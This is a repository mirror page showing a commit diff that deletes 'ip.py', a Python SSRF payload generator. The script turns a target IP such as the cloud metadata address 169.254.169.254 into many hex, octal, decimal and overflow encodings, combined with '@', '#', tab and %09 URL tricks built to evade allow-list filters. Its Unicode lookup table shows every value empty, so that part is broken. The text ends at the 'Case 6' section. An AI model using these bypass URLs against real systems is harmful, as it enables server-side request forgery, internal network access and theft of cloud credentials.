gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-01-09 11:44:49 -08:00
Code Issues Packages Projects Releases Wiki Activity

Fix name - Part 1

Browse Source
This commit is contained in:
Swissky
2019-03-07 00:07:14 +01:00
parent ee334f981e
commit 21d1fe7eee
328 changed files with 199 additions and 1 deletions
Download Patch File Download Diff File Expand all files Collapse all files

784
Server Side Request Forgery/Files/ip.py
View File

@@ -1,784 +0,0 @@
#!/usr/bin/python
# coding=utf-8
# https://raw.githubusercontent.com/cujanovic/SSRF-Testing/master/ip.py
from __future__ import print_function
from builtins import oct
from builtins import str
from builtins import hex
from builtins import range
from random import *
from io import open
import datetime
import string
import os
import sys
import platform
import random
EnclosedAlphanumericsData = {
'0' : [''],
'1' : [''],
'2' : [''],
'3' : [''],
'4' : [''],
'5' : [''],
'6' : [''],
'7' : [''],
'8' : [''],
'9' : [''],
'10' : [''],
'11' : [''],
'12' : [''],
'13' : [''],
'14' : [''],
'15' : [''],
'16' : [''],
'17' : [''],
'18' : [''],
'19' : [''],
'20' : [''],
'.' : ['',''],
'a' : [''],
'b' : [''],
'c' : [''],
'd' : [''],
'e' : [''],
'f' : [''],
'x' : [''],
}
def RANDOM_TEXT_SPEC():
min_char = 12
max_char = 16
chars = string.ascii_letters + string.digits + "!$%^&*()<>;:,.|\~`"
return "".join(choice(chars) for x in range(randint(min_char, max_char)))
def RANDOM_TEXT():
min_char = 12
max_char = 16
chars = string.ascii_letters + string.digits
return "".join(choice(chars) for x in range(randint(min_char, max_char)))
def DECIMAL_SINGLE(NUMBER,STEP):
return int(NUMBER)*(256**STEP)
def HEX_SINGLE(NUMBER,ADD0X):
if ADD0X == "yes":
return str(hex(int(NUMBER)))
else:
return str(hex(int(NUMBER))).replace("0x","")
def OCT_SINGLE(NUMBER):
return str(oct(int(NUMBER))).replace("o","")
def DEC_OVERFLOW_SINGLE(NUMBER):
return str(int(NUMBER)+256)
def validIP(address):
parts = address.split(".")
if len(parts) != 4:
return False
try:
for item in parts:
if not 0 <= int(item) <= 255:
return False
except ValueError:
print("\nUsage: python "+sys.argv[0]+" IP EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254\nUsage: python "+sys.argv[0]+" 169.254.169.254 export")
exit(1)
return True
def plain2EnclosedAlphanumericsChar(s0):
if s0 not in EnclosedAlphanumericsData:
raise Exception('value not found')
return random.choice(EnclosedAlphanumericsData[s0])
def convertIP2EnclosedAlphanumericsValue():
IPAddressParts4EnclosedAlphanumerics = arg1.split(".")
returnEnclosedAlphanumericsIPAddress = ""
for x in range(0,4):
if len(IPAddressParts4EnclosedAlphanumerics[x]) == 3 and (int(IPAddressParts4EnclosedAlphanumerics[x][0]+IPAddressParts4EnclosedAlphanumerics[x][1])) <= 20 and (int(IPAddressParts4EnclosedAlphanumerics[x][0]+IPAddressParts4EnclosedAlphanumerics[x][1]+IPAddressParts4EnclosedAlphanumerics[x][2])) >= 10:
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][0]+IPAddressParts4EnclosedAlphanumerics[x][1]);
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][2]);
if x <= 2:
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar('.');
else:
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][0]);
if len(IPAddressParts4EnclosedAlphanumerics[x]) >= 2:
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][1]);
if len(IPAddressParts4EnclosedAlphanumerics[x]) == 3:
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][2]);
if x <= 2:
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar('.');
return returnEnclosedAlphanumericsIPAddress
def convert(s, recurse_chunks=True, error_on_miss=False):
if s in EnclosedAlphanumericsData:
return random.choice(EnclosedAlphanumericsData[s])
if recurse_chunks and len(s) > 1:
return convert(s[:-1]) + convert(s[-1])
if error_on_miss:
raise Exception('Value not found: %s' % s)
return s
def convert_ip(ip, sep='.'):
return convert(sep).join([convert(chunk) for chunk in ip.split(sep)])
if len(sys.argv) < 4 or len(sys.argv) >= 6:
print("\nUsage: python "+sys.argv[0]+" IP PORT WhiteListedDomain EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com export")
exit(1)
redcolor='\x1b[0;31;40m'
greencolor='\x1b[0;32;40m'
yellowcolor='\x1b[0;33;40m'
bluecolor='\x1b[0;36;40m'
resetcolor='\x1b[0m'
arg1 = str(sys.argv[1])
if validIP(arg1) == False:
print("\n",yellowcolor,arg1,resetcolor,redcolor," is not a valid IPv4 address in dotted decimal format, example: 123.123.123.123",resetcolor,sep='')
print("\nUsage: python "+sys.argv[0]+" IP EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254\nUsage: python "+sys.argv[0]+" 169.254.169.254 export")
exit(1)
ipFrag3, ipFrag2, ipFrag1, ipFrag0 = arg1.split(".")
PORT=str(sys.argv[2])
RANDPREFIXTEXT=RANDOM_TEXT()
RANDPREFIXTEXTSPEC=RANDOM_TEXT_SPEC()
RANDOMPREFIXVALIDSITE=str(sys.argv[3])
FILENAME=''
try:
sys.argv[4]
except IndexError:
EXPORTRESULTS=''
else:
EXPORTRESULTS=str(sys.argv[4])
if EXPORTRESULTS == 'export':
FILENAME = "export-" + arg1 + "-" + str(datetime.datetime.now().strftime("%H-%M-%d-%m-%Y"))+'.txt'
pythonversion = (platform.python_version())
major, minor, patchlevel = pythonversion.split(".")
if major == "3":
f = open(FILENAME, 'w')
else:
f = open(FILENAME, 'wb')
elif EXPORTRESULTS != '':
print("\nUsage: python "+sys.argv[0]+" IP WhiteListedDomain EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com export")
exit(1)
#Case 1 - Dotted hexadecimal
print("\n",sep='')
print(bluecolor,"Dotted hexadecimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
IP1 = HEX_SINGLE(ipFrag3,"yes") + "." + HEX_SINGLE(ipFrag2,"yes") + "." + HEX_SINGLE(ipFrag1,"yes") + "." + HEX_SINGLE(ipFrag0,"yes")
print('http://',IP1,':',PORT,'/',sep='')
print('http://',IP1,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/','/',sep='')
print('http://',IP1,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',sep='')
print('http://',IP1,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP1,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP1,':',PORT,'/',sep='')
print('http://',IP1,':',PORT,':80','/',sep='')
print('http://',IP1,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP1,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP1,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IP1,':',PORT,'/',file=f,sep='')
print('http://',IP1,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP1,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':',PORT,'/',file=f,sep='')
#===========================================================================
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',file=f,sep='')
print('http://',IP1,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP1,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP1,':',PORT,'/',file=f,sep='')
print('http://',IP1,':',PORT,':80','/',file=f,sep='')
print('http://',IP1,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP1,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP1,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
#===========================================================================
#Case 2 - Dotless hexadecimal
print(bluecolor,"Dotless hexadecimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
IP2 = HEX_SINGLE(ipFrag3,"yes") + HEX_SINGLE(ipFrag2,"no") + HEX_SINGLE(ipFrag1,"no") + HEX_SINGLE(ipFrag0,"no")
print('http://',IP2,':',PORT,'/',sep='')
print('http://',IP2,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP2,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',sep='')
print('http://',IP2,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP2,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP2,':',PORT,'/',sep='')
print('http://',IP2,':',PORT,':80','/',sep='')
print('http://',IP2,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP2,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP2,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IP2,':',PORT,'/',file=f,sep='')
print('http://',IP2,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP2,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',file=f,sep='')
print('http://',IP2,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP2,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP2,':',PORT,'/',file=f,sep='')
print('http://',IP2,':',PORT,':80','/',file=f,sep='')
print('http://',IP2,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP2,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP2,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
#Case 3 - Dotless decimal
print(bluecolor,"Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
IP3 = str(DECIMAL_SINGLE(ipFrag3,3) + DECIMAL_SINGLE(ipFrag2,2) + DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
print('http://',IP3,':',PORT,'/',sep='')
print('http://',IP3,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP3,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',sep='')
print('http://',IP3,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP3,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP3,':',PORT,'/',sep='')
print('http://',IP3,':',PORT,':80','/',sep='')
print('http://',IP3,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP3,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP3,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IP3,':',PORT,'/',file=f,sep='')
print('http://',IP3,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP3,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',file=f,sep='')
print('http://',IP3,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP3,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP3,':',PORT,'/',file=f,sep='')
print('http://',IP3,':',PORT,':80','/',file=f,sep='')
print('http://',IP3,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP3,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP3,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
#Case 4 - Dotted decimal with overflow(256)
print(bluecolor,"Dotted decimal with overflow(256) IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
IP4 = DEC_OVERFLOW_SINGLE(ipFrag3) + "." + DEC_OVERFLOW_SINGLE(ipFrag2) + "." + DEC_OVERFLOW_SINGLE(ipFrag1) + "." + DEC_OVERFLOW_SINGLE(ipFrag0)
print('http://',IP4,':',PORT,'/',sep='')
print('http://',IP4,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP4,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',sep='')
print('http://',IP4,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP4,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP4,':',PORT,'/',sep='')
print('http://',IP4,':',PORT,':80','/',sep='')
print('http://',IP4,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP4,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP4,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IP4,':',PORT,'/',file=f,sep='')
print('http://',IP4,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP4,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',file=f,sep='')
print('http://',IP4,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP4,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP4,':',PORT,'/',file=f,sep='')
print('http://',IP4,':',PORT,':80','/',file=f,sep='')
print('http://',IP4,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP4,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP4,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
#Case 5 - Dotted octal
print(bluecolor,"Dotted octal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
IP5 = OCT_SINGLE(ipFrag3) + "." + OCT_SINGLE(ipFrag2) + "." + OCT_SINGLE(ipFrag1) + "." + OCT_SINGLE(ipFrag0)
print('http://',IP5,':',PORT,'/',sep='')
print('http://',IP5,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP5,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',sep='')
print('http://',IP5,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP5,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP5,':',PORT,'/',sep='')
print('http://',IP5,':',PORT,':80','/',sep='')
print('http://',IP5,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP5,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
print('http://',IP5,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IP5,':',PORT,'/',file=f,sep='')
print('http://',IP5,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP5,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',file=f,sep='')
print('http://',IP5,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP5,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP5,':',PORT,'/',file=f,sep='')
print('http://',IP5,':',PORT,':80','/',file=f,sep='')
print('http://',IP5,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP5,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP5,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
#Case 6 - Dotted octal with padding
print(bluecolor,"Dotted octal with padding IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
